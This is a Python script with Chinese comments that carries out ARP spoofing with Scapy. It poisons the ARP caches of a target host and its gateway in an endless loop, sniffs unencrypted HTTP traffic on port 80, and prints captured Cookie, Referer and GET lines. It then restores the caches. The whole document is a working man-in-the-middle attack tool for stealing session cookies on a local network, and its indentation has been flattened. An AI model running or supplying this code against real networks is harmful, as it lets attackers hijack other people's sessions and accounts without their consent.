'''
ARP欺骗
'''
from scapy.all import *
import time
from threading import Thread
def main(target_ip, gateway_ip):
conf.verb = 0
#获取IP地址对应的MAC地址
target_mac = get_mac(target_ip)
gateway_mac = get_mac(gateway_ip)
#启动ARP欺骗
t = Thread(target=poison_target, args=(target_ip,target_mac,gateway_ip,gateway_mac))
#当主线程结束后,子线程也会自动结束
t.setDaemon(True)
t.start()
#嗅探数据包
sniff(filter="tcp port 80", prn=packet_callback, store=0)
#恢复靶机ARP缓存
restore_target(target_ip,target_mac,gateway_ip,gateway_mac)
#恢复靶机ARP缓存涵数
def restore_target(target_ip,target_mac,gateway_ip,gateway_mac):
print("[*] Restoring target...")
#恢复靶机缓存
send(ARP(op=2, psrc=gateway_ip, hwsrc=gateway_mac,pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff"), count=5)
# 恢复网关缓存
send(ARP(op=2, psrc=target_ip, hwsrc=target_mac, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff"), count=5)
#Cookie嗅探涵数
def packet_callback(packet):
if packet[TCP].payload:
cookie_packet = bytes(packet[TCP].payload)
if b"Cookie" in cookie_packet:
for info in cookie_packet.split(b"\n"):
if b"Refere" in info or b"GET /" in info:
print(info)
elif b"Cookie" in info:
print(info, "\n")
#ARP欺骗涵数
def poison_target(target_ip,target_mac,gateway_ip,gateway_mac):
#欺骗靶机
target = ARP()
target.op = 2
target.psrc = gateway_ip
target.pdst = target_ip
target.hwdst = target_mac
#欺骗网关
gateway = ARP()
gateway.op = 2
gateway.psrc = target_ip
gateway.pdst = gateway_ip
gateway.hwdst = gateway_mac
print("[*] Beginning the ARP poison...")
while True:
send(target)
send(gateway)
time.sleep(2)
#获取MAC地址涵数
def get_mac(ip):
response , unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),timeout=2)
for s, r in response:
return r[ARP].hwsrc
if __name__ == "__main__":
#从命令行获取要欺骗的IP
target_ip = input("Input target ip:")
gateway_ip = input("Input gateway ip:")
main(target_ip, gateway_ip)